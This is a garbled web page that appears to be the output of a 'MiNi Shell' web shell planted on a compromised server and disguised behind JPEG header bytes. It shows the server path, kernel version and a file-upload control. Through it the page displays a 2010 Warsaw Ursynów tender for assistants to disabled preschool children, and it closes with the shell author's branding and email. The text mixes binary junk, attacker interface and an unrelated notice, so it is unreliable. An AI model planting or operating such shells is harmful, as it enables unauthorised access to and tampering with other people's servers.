JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100928/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100928/266671-N-2010.html

<p class="kh_header"><b>Warszawa: ŚWIADCZENIE USŁUG POLEGAJĄCYCH NA PEŁNIENIU FUNKCJI ASYSTENTÓW DZIECI NIEPEŁNOSPRAWNYCH MAJĄCYCH TRUDNOŚCI Z PRZYSTOSOWANIEM SIĘ DO PRACY W GRUPIE PRZEDSZKOLNEJ W PROJEKCIE PRZEDSZKOLE RÓWNYCH SZANS WSPÓŁFINANSOWANYM PRZEZ UNIĘ EUROPEJSKĄ W RAMACH EUROPEJSKIEGO FUNDUSZU SPOŁECZNEGO</b><br>
<b>Numer ogłoszenia: 266671 - 2010; data zamieszczenia: 28.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Stołeczne Warszawa Dzielnica Ursynów , al. Komisji Edukacji Narodowej 61, 02-777 Warszawa, woj. mazowieckie, tel. 022 5457100, faks 022 5457291.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ursynow.waw.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ŚWIADCZENIE USŁUG POLEGAJĄCYCH NA PEŁNIENIU FUNKCJI ASYSTENTÓW DZIECI NIEPEŁNOSPRAWNYCH MAJĄCYCH TRUDNOŚCI Z PRZYSTOSOWANIEM SIĘ DO PRACY W GRUPIE PRZEDSZKOLNEJ W PROJEKCIE PRZEDSZKOLE RÓWNYCH SZANS WSPÓŁFINANSOWANYM PRZEZ UNIĘ EUROPEJSKĄ W RAMACH EUROPEJSKIEGO FUNDUSZU SPOŁECZNEGO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotowe postępowanie o udzielenie zamówienia prowadzone jest w ramach Projektu Przedszkole Równych Szans współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego. 
1. Opis projektu
Zgodnie z założeniem Projektu Przedszkole Równych Szans współfinansowanym przez Unię Europejską w ramach Europejskiego Funduszu Społecznego usługa Asystentów dzieci niepełnosprawnych polegać będzie na współpracy z grupą przedszkolną, do której uczęszcza dziecko z problemami w zachowaniu i problemami zdrowotnymi, które uniemożliwiają mu pracę i zabawę w grupie rówieśniczej. Zadaniem asystentów będzie towarzyszenie dziecku w ciągu dnia w sytuacjach dydaktycznych, zabawowych oraz podczas wyjść poza teren przedszkola.
2. Szczegółowy opis przedmiotu zamówienia	
Zamawiający w przedmiotowym zamówieniu przewidział 6 niżej wymienionych części:
Część I: Świadczenie usługi polegającej na pełnieniu funkcji Asystenta dziecka niepełnosprawnego mającego trudności z przystosowaniem się do pracy w grupie przedszkolnej w PRZEDSZKOLU SPECJALNYM NR 213 w projekcie Przedszkole Równych Szans współfinansowanym przez Unię Europejską w ramach Europejskiego Funduszu Społecznego;
Część II: Świadczenie usługi polegającej na pełnieniu funkcji Asystenta dziecka niepełnosprawnego mającego trudności z przystosowaniem się do pracy w grupie przedszkolnej w PRZEDSZKOLU SPECJALNYM NR 213 w projekcie Przedszkole Równych Szans współfinansowanym przez Unię Europejską w ramach Europejskiego Funduszu Społecznego;
Część III: Świadczenie usługi polegającej na pełnieniu funkcji Asystenta dziecka niepełnosprawnego mającego trudności z przystosowaniem się do pracy w grupie przedszkolnej w PRZEDSZKOLU SPECJALNYM NR 213 w projekcie Przedszkole Równych Szans współfinansowanym przez Unię Europejską w ramach Europejskiego Funduszu Społecznego;
Część IV: Świadczenie usługi polegającej na pełnieniu funkcji Asystenta dziecka niepełnosprawnego mającego trudności z przystosowaniem się do pracy w grupie przedszkolnej w PRZEDSZKOLU SPECJALNYM NR 213 w projekcie Przedszkole Równych Szans współfinansowanym przez Unię Europejską w ramach Europejskiego Funduszu Społecznego;
Część V: Świadczenie usługi polegającej na pełnieniu funkcji Asystenta dziecka niepełnosprawnego mającego trudności z przystosowaniem się do pracy w grupie przedszkolnej w PRZEDSZKOLU INTEGRACYJNYM NR 394 w projekcie Przedszkole Równych Szans współfinansowanym przez Unię Europejską w ramach Europejskiego Funduszu Społecznego;
Część VI: Świadczenie usługi polegającej na pełnieniu funkcji Asystenta dziecka niepełnosprawnego mającego trudności z przystosowaniem się do pracy w grupie przedszkolnej w PRZEDSZKOLU INTEGRACYJNYM NR 394 w projekcie Przedszkole Równych Szans współfinansowanym przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.

Dotyczy Części od I do IV:
Świadczeniem usługi Asystenta dziecka niepełnosprawnego objęte będzie jedno dziecko uczęszczające do Przedszkola Specjalnego Nr 213 w Warszawie.
Do zakresu obowiązków Asystenta dziecka niepełnosprawnego należy w szczególności:	
a)Wykonywanie czynności związanych z obsługą i opieką nad dzieckiem, szczególnie w zakresie higieny osobistej, karmienia i ubierania,
b)Wspieranie nauczyciela w organizowaniu oraz prowadzeniu zajęć dydaktycznych i zabaw dla dziecka,
c)Czuwanie nad bezpieczeństwem dziecka podczas zajęć, zabaw w sali oraz pobytu na powietrzu,
d)Prowadzenie ewaluacji wykonywanych zadań,
e)Udział w spotkaniach zespołu realizatorów prowadzonych przez kierownika projektu,
f)Współpraca z koordynatorem i kierownikiem projektu, dyrektorem 
i kadrą pedagogiczną,
g)Stosowanie się do regulaminu projektu i regulaminów obowiązujących 
w Przedszkolu Specjalnym Nr 213,
h)Świadczenie usługi zgodnie z harmonogramem zajęć, o którym mowa w §1 ust.4 wzoru umowy.
Miejsce i godziny realizacji usługi: Przedszkole Specjalne Nr 213 w Warszawie w godzinach realizacji Projektu, tj. 7:00-19:00.
Przewidywana liczba godzin: 2460, w tym: w roku 2010 - 492 godziny, w roku 2011 - 1230 godzin, w roku 2012 - 738 godzin.

Dotyczy Części od V do VI:
Świadczeniem usługi Asystenta dziecka niepełnosprawnego objęte będzie jedno dziecko uczęszczające do Przedszkola Integracyjnego 394 w Warszawie.
Do zakresu obowiązków Asystenta dziecka niepełnosprawnego należy w szczególności:
a)Wykonywanie czynności związanych z obsługą i opieką nad dzieckiem, szczególnie w zakresie higieny osobistej, karmienia i ubierania,
b)Wspieranie nauczyciela w organizowaniu oraz prowadzeniu zajęć dydaktycznych i zabaw dla dziecka,
c)Czuwanie nad bezpieczeństwem dziecka podczas zajęć, zabaw w sali oraz pobytu na powietrzu,
d)Prowadzenie ewaluacji wykonywanych zadań,
e)Udział w spotkaniach zespołu realizatorów prowadzonych przez kierownika projektu,
f)Współpraca z koordynatorem i kierownikiem projektu, dyrektorem 
i kadrą pedagogiczną,
g)Stosowanie się do regulaminu projektu i regulaminów obowiązujących 
w Przedszkolu Integracyjnym Nr 394,
h)Świadczenie usługi zgodnie z harmonogramem zajęć, o którym mowa w §1 ust.4 wzoru umowy.
Miejsce i godziny realizacji usługi: Przedszkole Integracyjne Nr 394 w Warszawie w godzinach realizacji Projektu, tj. 7:00-19:00.
Przewidywana liczba godzin: 2460, w tym: w roku 2010 - 492 godziny, w roku 2011 - 1230 godzin, w roku 2012 - 738 godzin.

Szczegółowy opis przedmiotu zamówienia określa również wzór umowy stanowiący odpowiednio: 
- załącznik nr 6A-6C do SIWZ - w odniesieniu do Części I-IV;
- załącznik nr 6D-6F do SIWZ - w odniesieniu do Części V-VI.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 85.31.21.20-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert w postępowaniu (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) wykonał1 (tj. zakończył) lub wykonuje2 co najmniej jedną usługę polegającą na: opiece nad dzieckiem/dziećmi niepełnosprawnym/mi w wieku przedszkolnym realizowaną przez okres nie krótszy niż 3 miesiące3 dla jednego Zamawiającego LUB pracy z dzieckiem/dziećmi niepełnosprawnym/mi w wieku przedszkolnym realizowaną przez okres nie krótszy niż 3 miesiące3 dla jednego Zamawiającego. 
UWAGA!
1 Za wykonaną usługę Zamawiający uzna taką usługę, którą Wykonawca wykonał i której przedmiot został odebrany przez Zamawiającego jako wykonany należycie;
2 W przypadku, gdy Wykonawca wykaże się usługą, która jest w toku realizacji tzn. jest wykonywana, Zamawiający uzna warunek za spełniony, jeżeli na dzień składania ofert okres wykonywania usługi jest nie krótszy niż 3 miesiące, a dokument, o którym mowa w pkt 8.1.2. SIWZ (np. referencja) potwierdzi, że usługa wykonywana jest należycie.
3 Przy obliczaniu okresu -nie krótszego niż 3 miesiące- należy wziąć pod uwagę brzmienie art.112 ustawy Kodeks cywilny, zgodnie z którym Termin oznaczony w miesiącach kończy się z upływem dnia, który datą odpowiada początkowemu dniowi terminu, a gdyby takiego dnia w ostatnim miesiącu nie było - w ostatnim dniu tego miesiąca. 

Ocena spełniania warunku udziału w postępowaniu dokonana zostanie w systemie 1 lub 0, zgodnie z formułą spełnia-nie spełnia w oparciu o informacje zawarte w oświadczeniach/dokumentach wyszczególnionych w pkt III.4.1) Ogłoszenia. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Wykonawca dysponuje osobami zdolnymi do wykonania zamówienia, tj. w szczególności co najmniej jedną osobą: posiadającą wykształcenie co najmniej średnie.

Ocena spełniania warunku udziału w postępowaniu dokonana zostanie w systemie 1 lub 0, zgodnie z formułą spełnia-nie spełnia w oparciu o informacje zawarte w oświadczeniach/dokumentach wyszczególnionych w pkt III.4.1) Ogłoszenia. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku gdy wykonawca będzie polegał na wiedzy i doświadczeniu, osobach zdolnych do wykonania zamówienia, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
Dodatkowo nadmienia się, iż zgodnie z zamieszczoną na stronie internetowej Urzędu Zamówień Publicznych - opinią prawną pn. Warunki dopuszczalności powoływania się przez wykonawcę na referencje dotyczące osób trzecich w celu wykazana spełniania warunków udziału w postępowaniu (art. 26 ust. 2b ustawy - Prawo zamówień publicznych) powoływanie się przez Wykonawcę na doświadczenie podmiotu trzeciego i posiadane przez niego referencje będzie dopuszczalne  wyłącznie w sytuacji, gdy podmiot trzeci będzie brał udział w wykonywaniu zamówienia - jako podwykonawca.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W odniesieniu do art.144 ust.1 ustawy Prawo zamówień publicznych - Zamawiający zastrzega sobie możliwość zmiany warunków umowy na etapie jej realizacji w zakresie:
a) terminu realizacji - pod warunkiem że zaszły okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, a w szczególności: w sytuacji wniesienia środków ochrony prawnej przedłuża się procedura postępowania, przy czym w niniejszym przypadku termin przesuwa się o czas trwania wymienionej przyczyny;
b) czasu pracy przewidzianego do realizacji przez Wykonawcę w poszczególnych latach realizacji umowy (2010, 2011, 2012) - pod warunkiem, że z przyczyn od Wykonawcy niezależnych brak było możliwości jego wypracowania w danym roku;
c) maksymalnego wynagrodzenia umownego w poszczególnych latach realizacji umowy (2010, 2011, 2012) - pod warunkiem, że zaszły okoliczności, o których mowa w ppk b);
d) maksymalnego wynagrodzenia umownego - pod warunkiem, że zaszły okoliczności, o których mowa w ppk b);
e) harmonogramu zajęć stanowiącego integralną część umowy - pod warunkiem, że zaszły okoliczności, o których mowa w ppk b).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ursynow.waw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> osobiście w Urzędzie m. st. Warszawy Dzielnicy Ursynów, 02-777 Warszawa, Al. KEN 61 pok. nr 343.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.10.2010 godzina 10:30, miejsce: SIEDZIBA ZAMAWIAJACEGO PRZY AL. KEN 61, WYDZIAŁ INFRASTRUKTURY, POK. NR 537.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiotowe postępowanie o udzielenie zamówienia prowadzone jest w ramach Projektu Przedszkole Równych Szans współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com